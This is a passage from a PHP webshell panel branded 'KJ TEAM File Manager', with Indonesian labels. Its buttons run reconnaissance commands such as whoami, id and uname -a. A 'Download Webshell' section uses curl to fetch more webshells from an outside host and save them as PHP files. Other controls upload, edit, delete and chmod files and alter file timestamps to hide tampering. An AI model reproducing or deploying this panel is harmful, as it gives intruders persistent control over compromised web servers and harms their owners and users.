            <form method="POST"><input type="hidden" name="command" value="ls -la"><button type="submit" name="run_command" class="btn btn-sm">ls -la</button></form>
            <form method="POST"><input type="hidden" name="command" value="pwd"><button type="submit" name="run_command" class="btn btn-sm">pwd</button></form>
            <form method="POST"><input type="hidden" name="command" value="whoami"><button type="submit" name="run_command" class="btn btn-sm">whoami</button></form>
            <form method="POST"><input type="hidden" name="command" value="id"><button type="submit" name="run_command" class="btn btn-sm">id</button></form>
            <form method="POST"><input type="hidden" name="command" value="uname -a"><button type="submit" name="run_command" class="btn btn-sm">uname -a</button></form>
        </div>
    </div>

    <!-- WEBSHELL DOWNLOAD -->
    <div class="section-box">
        <h3>📥 Download Webshell</h3>
        <div class="flex-wrap">
            <form method="POST"><input type="hidden" name="command" value="curl -sL ngtools.site/ibs/ladev.txt | tee kjteam.php"><button type="submit" name="run_command" class="btn btn-sm">KjTeam</button></form>
            <form method="POST"><input type="hidden" name="command" value="curl -sL ngtools.site/ibs/bora.txt | tee bora.php"><button type="submit" name="run_command" class="btn btn-sm">Bora</button></form>
            <form method="POST"><input type="hidden" name="command" value="curl -sL ngtools.site/ibs/dragon.txt | tee dragon.php"><button type="submit" name="run_command" class="btn btn-sm">Dragon</button></form>
            <form method="POST"><input type="hidden" name="command" value="curl -sL ngtools.site/ibs/lapanel.txt | tee lapanel.php"><button type="submit" name="run_command" class="btn btn-sm">Lapanel</button></form>
            <form method="POST"><input type="hidden" name="command" value="curl -sL ngtools.site/ibs/adminer.txt | tee adminer.php"><button type="submit" name="run_command" class="btn btn-sm">Adminer</button></form>
        </div>
    </div>

    <!-- FILE OPERATIONS -->
    <div class="section-box">
        <h3>📁 File Operations</h3>
        <form method="POST" enctype="multipart/form-data" class="flex-wrap">
            <input type="file" name="uploaded_file">
            <button type="submit" name="upload" class="btn">📤 Upload</button>
        </form>
        <form method="POST" class="flex-wrap">
            <input type="text" name="folder_name" placeholder="Nama folder baru">
            <button type="submit" name="create_folder" class="btn">📁 Buat Folder</button>
        </form>
        <form method="POST" class="flex-wrap">
            <input type="text" name="file_name" placeholder="Nama file baru (contoh: file.txt)">
            <button type="submit" name="create_file" class="btn">📄 Buat File</button>
        </form>
    </div>

    <!-- SCAN BACKDOOR -->
    <div class="section-box">
        <h3>🔍 Security Scanner</h3>
        <form method="POST" class="flex-wrap">
            <input type="text" name="scan_path" placeholder="Path yang ingin discan" value="<?php echo x($currentPath); ?>" style="flex:1;min-width:200px;">
            <button type="submit" name="scan_backdoor" class="btn">🔍 Scan</button>
        </form>
        <div style="margin-top:8px;font-size:12px;color:#4a9eff;">
            📁 Ekstensi yang discan: <strong>PHP, PHTML, SHTML</strong>
        </div>
    </div>

    <!-- ZIP/UNZIP -->
    <div class="section-box">
        <h3>📦 Zip / Unzip</h3>
        <div class="flex-wrap">
            <select id="zip_path">
                <option value="">-- Pilih ZIP --</option>
                <?php foreach ($allFiles as $zip): ?>
                    <option value="<?php echo $currentPath . DIRECTORY_SEPARATOR . $zip; ?>"><?php echo x($zip); ?></option>
                <?php endforeach; ?>
            </select>
            <button onclick="unzipFile()" class="btn">📂 Unzip</button>
            <span style="color:#6c8cba;margin:0 5px;">|</span>
            <select id="folder_to_zip">
                <option value="">-- Pilih Folder --</option>
                <?php foreach ($allFolders as $folder): ?>
                    <option value="<?php echo $currentPath . DIRECTORY_SEPARATOR . $folder; ?>"><?php echo x($folder); ?></option>
                <?php endforeach; ?>
            </select>
            <button onclick="zipFolder()" class="btn">📦 ZIP</button>
        </div>
        <div id="result" style="margin-top:10px;"></div>
    </div>

    <!-- FILE LIST -->
    <div style="overflow-x:auto;">
        <table>
            <thead>
                <tr>
                    <th>📄 Nama</th>
                    <th>Ukuran</th>
                    <th>Permission</th>
                    <th>Owner</th>
                    <th>Group</th>
                    <th>📅 Tanggal</th>
                    <th>⚡ Aksi</th>
                </tr>
            </thead>
            <tbody>
            <?php
            $items = scandir($currentPath);
            $folders = [];
            $files = [];
            foreach ($items as $item) {
                if ($item === '.' || $item === '..') continue;
                $fullPath = $currentPath . DIRECTORY_SEPARATOR . $item;
                if (is_dir($fullPath)) $folders[] = $item;
                else $files[] = $item;
            }
            $sortedItems = array_merge($folders, $files);

            foreach ($sortedItems as $item) {
                $fullPath = $currentPath . DIRECTORY_SEPARATOR . $item;
                $perm = substr(sprintf('%o', fileperms($fullPath)), -4);
                $stat = stat($fullPath);
                $owner = function_exists('posix_getpwuid') ? (posix_getpwuid($stat['uid']) ?? ['name' => $stat['uid']])['name'] : $stat['uid'];
                $group = function_exists('posix_getgrgid') ? (posix_getgrgid($stat['gid']) ?? ['name' => $stat['gid']])['name'] : $stat['gid'];
                $isDir = is_dir($fullPath);
                $date = date("Y-m-d H:i:s", filemtime($fullPath));

                echo '<tr>';
                if (!$isDir) {
                    echo '<td><form method="POST" style="display:inline;"><input type="hidden" name="edit_path" value="' . x($fullPath) . '"><button type="submit" name="edit" class="btn btn-sm">' . x($item) . '</button></form></td>';
                } else {
                    echo '<td><a href="?d=' . urlencode($fullPath) . '">📁 ' . x($item) . '</a></td>';
                }
                echo '<td>' . ($isDir ? '📁 Folder' : formatSize(filesize($fullPath))) . '</td>';
                echo '<td ' . permColor($fullPath) . '>' . $perm . '</td>';
                echo '<td>' . x($owner) . '</td>';
                echo '<td>' . x($group) . '</td>';
                echo '<td>' . $date . '</td>';
                echo '<td>';
                echo '<div class="flex-wrap" style="gap:2px;">';
                
                if (!$isDir) {
                    echo '<form method="POST" style="display:inline;"><input type="hidden" name="edit_path" value="' . x($fullPath) . '"><button type="submit" name="edit" class="btn btn-sm">✏️ Edit</button></form>';
                }
                
                echo '<form method="POST" style="display:inline;">
                    <input type="hidden" name="rename_path" value="' . x($fullPath) . '">
                    <input type="text" name="new_name" placeholder="Rename" style="width:80px;padding:2px 5px;font-size:11px;">
                    <button type="submit" name="rename" class="btn btn-sm">🔄</button>
                </form>
                <form method="POST" style="display:inline;">
                    <input type="hidden" name="perm_path" value="' . x($fullPath) . '">
                    <input type="text" name="permissions" placeholder="0755" style="width:50px;padding:2px 5px;font-size:11px;">
                    <button type="submit" name="change_perm" class="btn btn-sm">🔑</button>
                </form>
                <form method="POST" style="display:inline;">
                    <input type="hidden" name="time_path" value="' . x($fullPath) . '">
                    <input type="text" name="new_time" placeholder="2024-08-18 01:50:07" style="width:120px;padding:2px 5px;font-size:11px;">
                    <button type="submit" name="change_time" class="btn btn-sm">📅</button>
                </form>
                <form method="POST" style="display:inline;" onsubmit="return confirmDelete();">
                    <input type="hidden" name="delete_path" value="' . x($fullPath) . '">
                    <button type="submit" name="delete" class="btn btn-sm btn-danger">🗑️</button>
                </form>';
                
                if (!$isDir) {
                    $url = file_path_to_url(x($fullPath));
                    if ($url) {
                        echo '<a href="' . $url . '" target="_blank"><button type="button" class="btn btn-sm">🔗</button></a>';
                    }
                }
                
                echo '</div></td></tr>';
            }
            ?>
            </tbody>
        </table>
    </div>

    <div style="text-align:center;padding:20px;color:#6c8cba;font-size:12px;border-top:1px solid #2d4a7a;margin-top:20px;">
        KJ TEAM File Manager v2.0 | Protected Mode | Click any directory to navigate
    </div>
</div>

<script>
function unzipFile() {
    const zipPath = document.getElementById('zip_path').value;
    if (!zipPath) return alert('Pilih file ZIP dulu!');
    fetch('', {
        method: 'POST',
        headers: {'Content-Type': 'application/x-www-form-urlencoded'},
        body: new URLSearchParams({action: 'unzip', zip_path: zipPath})
    })
    .then(res => res.json())
    .then(data => document.getElementById('result').innerHTML = 
        `<div class="alert ${data.status === 'success' ? 'success' : 'error'}">${data.message}</div>`);
}

function zipFolder() {
    const folder = document.getElementById('folder_to_zip').value;
    if (!folder) return alert('Pilih folder dulu!');
    fetch('', {
        method: 'POST',
        headers: {'Content-Type': 'application/x-www-form-urlencoded'},
        body: new URLSearchParams({action: 'zip', folder_to_zip: folder})
    })
    .then(res => res.json())
    .then(data => document.getElementById('result').innerHTML = 
        `<div class="alert ${data.status === 'success' ? 'success' : 'error'}">${data.message}</div>`);
}
</script>

</body>
</html>
